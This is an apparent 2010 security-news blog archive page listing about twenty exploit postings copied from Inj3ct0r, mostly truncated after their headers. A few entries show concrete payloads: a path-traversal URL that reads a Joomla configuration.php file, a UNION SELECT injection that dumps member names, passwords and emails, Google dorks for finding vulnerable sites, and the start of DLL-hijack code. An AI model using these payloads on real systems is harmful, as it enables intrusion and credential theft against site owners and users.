Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

Entries for August 31st, 2010

Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit

Aug.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Linux Kernel &lt; 2.6.36-rc1 CAN BCM Privilege Escalation Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==============================================================
Linux Kernel &lt; 2.6.36-rc1 CAN BCM Privilege Escalation Exploit
==============================================================
/*
* i-CAN-haz-MODHARDEN.c
*
* Linux Kernel &lt; 2.6.36-rc1 CAN BCM Privilege Escalation Exploit
* Jon Oberheide &lt;jon@oberheide.org&gt;
* http://jon.oberheide.org
*
[...]

Leave a Comment

McAfee LinuxShield <= 1.5.1 Local/Remote Root Code Execution

Aug.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>McAfee LinuxShield &lt;= 1.5.1 Local/Remote Root Code Execution</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>============================================================
McAfee LinuxShield &lt;= 1.5.1 Local/Remote Root Code Execution
============================================================
#!/usr/bin/perl
##
# Title: McAfee LinuxShield &lt;= 1.5.1 Local/Remote Root Exploit
# Name: nailsRoot.pl
# [...]

Leave a Comment

GuestBookPlus HTML Injection & Bypass Comments Limit

Aug.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>GuestBookPlus HTML Injection &amp; Bypass Comments Limit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================
GuestBookPlus HTML Injection &amp; Bypass Comments Limit
====================================================
=======================================================================
# [...]

Leave a Comment

vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability

Aug.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>vBulletin 3.8.4 &amp; 3.8.5 Registration Bypass Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================================
vBulletin 3.8.4 &amp; 3.8.5 Registration Bypass Vulnerability
=========================================================
010101010101010101010101010101010101010101010101010101010
0 [...]

Leave a Comment

Joomla Component com_picsell Local File Disclosure Vulnerability

Aug.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_picsell Local File Disclosure Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================================
Joomla Component com_picsell Local File Disclosure Vulnerability
================================================================
# Author: Craw
# Email: craw@element7.eu
# Software Link: http://vm.xmlswf.com/index.php?option=com_content&amp;view=article&amp;id=104&amp;Itemid=131
# Category: web applications
=======================================================
[+] ExploiT :
http://server/index.php?option=com_picsell&amp;controller=prevsell&amp;task=dwnfree&amp;dflink=[File Disclosure]
[+] Example :
http://server/index.php?option=com_picsell&amp;controller=prevsell&amp;task=dwnfree&amp;dflink=../../../configuration.php
=======================================================
Greetz @ LUXEMBOURG
=======================================================
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-08-30]</pre><script type=’text/javascript’>var gaJsHost = [...]

Leave a Comment

Joomla Component com_jefaqpro Blind SQL Injection Vulnerability

Aug.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_jefaqpro Blind SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================================
Joomla Component com_jefaqpro Blind SQL Injection Vulnerability
===============================================================
Author : Chip D3 Bi0s
Group : LatinHackTeam
Email &amp; msn : chipdebios[at]gmail[dot]com
Date [...]

Leave a Comment

Joomla component com_ligas Sql Injection Vulnerability

Aug.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla component com_ligas Sql Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>======================================================
Joomla Component com_ligas SQL Injection Vulnerability
======================================================
# Author : Forza-Dz
# Version : All Versions
# Tested on : Win Sp2
############################################################
Dork = inurl:&quot;oops&quot;
############################################################
— SQL Injection Vulenrability —
SQL Injection Vulenrability component &quot;com_ligas&quot;
http://www.site.com/path/iindex.php?option=com_ligas&amp;lg=[SQL]
############################################################
===[Injection]===
[SQL] 1=1 &quot;no Exploit for [...]

Leave a Comment

WysGui 2.3 Multiple Vulnerabilities

Aug.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>WysGui 2.3 Multiple Vulnerabilities</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===================================
WysGui 2.3 Multiple Vulnerabilities
===================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Elite Gaming Ladders v3.2 CMS SQL Injection Vulnerability

Aug.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Elite Gaming Ladders v3.2 CMS SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================================
Elite Gaming Ladders v3.2 CMS SQL Injection Vulnerability
=========================================================
Author: SpAmBoT
Software Link: http://eliteladders.com/
Version: v3.2
Category: webapps
Google dork: Powered by: Elite Gaming Ladders v3.2
Testet on: Linux
http://[PAGE]/ladders.php?platform=1 UNION SELECT 1,2,3,concat(name,0×3a,password,0×3a,email),5,6,7 FROM members–
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-08-31]</pre><script [...]

Leave a Comment

Spybot-S&D blindman.exe DLL Hijacking (wer.dll)

Aug.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Spybot-S&amp;D blindman.exe DLL Hijacking (wer.dll)</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================
Spybot-S&amp;D blindman.exe DLL Hijacking (wer.dll)
===============================================
/*
Spybot-S&amp;D blindman.exe DLL Hijacking (wer.dll)
Date: August 30, 2010
Author: kB0]1_
Software : http://www.safer-networking.org/en/faq/25.html
Version: 1.6.2
Vulnerable Extension : .disabled
Tested on: XP Pro SP2
*/
#include &lt;windows.h&gt;
int pwnme()
{
[...]

Leave a Comment

Feng Office Persistent XSS Vulnerability

Aug.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Feng Office Persistent XSS Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>========================================
Feng Office Persistent XSS Vulnerability
========================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Web-Ideas Web Shop Standard SQL Injection Vulnerability

Aug.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Web-Ideas Web Shop Standard SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================================
Web-Ideas Web Shop Standard SQL Injection Vulnerability
=======================================================
# Exploit Title: [SQL injection in web-ideas web shop standard]
# Date: [31.08.2010]
# Author: [Ariko-Security]
# Software Link: [ http://www.web-ideas.com.au/web-shop_standard]
# Version: [ALL]
# Tested on: [ALL]
# CVE : [...]

Leave a Comment

ATK Persistent/Non persistent XSS Vulnerability

Aug.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>ATK Persistent/Non persistent XSS Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================
ATK Persistent/Non persistent XSS Vulnerability
===============================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Radiant cms Persistent XSS Vulnerability

Aug.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Radiant cms Persistent XSS Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>========================================
Radiant cms Persistent XSS Vulnerability
========================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

MPLAB IDE .mcp .mcw DLL Hijacking

Aug.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>MPLAB IDE .mcp .mcw DLL Hijacking</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=================================
MPLAB IDE .mcp .mcw DLL Hijacking
=================================
/*
MPLAB IDE .mcw DLL Hijacking
Date: August 31, 2010
Author: kB0]1_
Software: http://www.microchip.com/stellent/idcplg?IdcService=SS_GET_PAGE&amp;nodeId=1406&amp;dDocName=en019469&amp;part=SW007002
Version: v.8.56
Vulnerable Extensions: .mcp,.mcw
Vulnerable dll’s: mfc71loc.dll,mfc71nld.dll,pe932b.dll,pe936b.dll,pegrc32b.dll
Tested on: XP Pro SP2 [...]

Leave a Comment

Get Short & Protected Link SQL Injection Vulnerability

Aug.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Get Short &amp; Protected Link SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>======================================================
Get Short &amp; Protected Link SQL Injection Vulnerability
======================================================
######################################################
# Exploit Title : Get Short &amp; Protected Link SQL Injection Vulnerability
# Download Script : http://www.zshare.net/download/79923860ef84f4dc/
# Author : ScOrPiOn
# Google Dork : [...]

Leave a Comment

Advanced Guestbook 2.2 Blind SQL Injection Vulnerabilities

Aug.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Advanced Guestbook 2.2 Blind SQL Injection Vulnerabilities</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================================================
Advanced Guestbook 2.2 Blind SQL Injection Vulnerabilities
==========================================================
######################################################
# Exploit Title : Advanced Guestbook 2.2 Blind SQL Injection Vulnerabilities
# Publisher Site : http://www.proxy2.de/
# Author : ScOrPiOn
# Google Dork : &quot;Powered by PHP [...]

Leave a Comment

dompdf RFI Vulnerability

Aug.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>dompdf RFI Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================
[x] ExpL0it TitLe : apps dompdf RFI Vulnerability
[x] DatE : 01 September 2010
[x] AutH0r : Andre_Corleone
[x] Software Link : [...]

Leave a Comment

Lemox CMS Blind SQL Injection Vulnerability

Aug.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Lemox CMS Blind SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===========================================
Lemox CMS Blind SQL Injection Vulnerability
===========================================
################################################################
## [...]

Leave a Comment

Bloghoster v 2.50 + 2.70 + 2.10 Upload Vulnerability

Aug.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Bloghoster v 2.50 + 2.70 + 2.10 Upload Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================
Bloghoster v 2.50 + 2.70 + 2.10 Upload Vulnerability
====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

Leave a Comment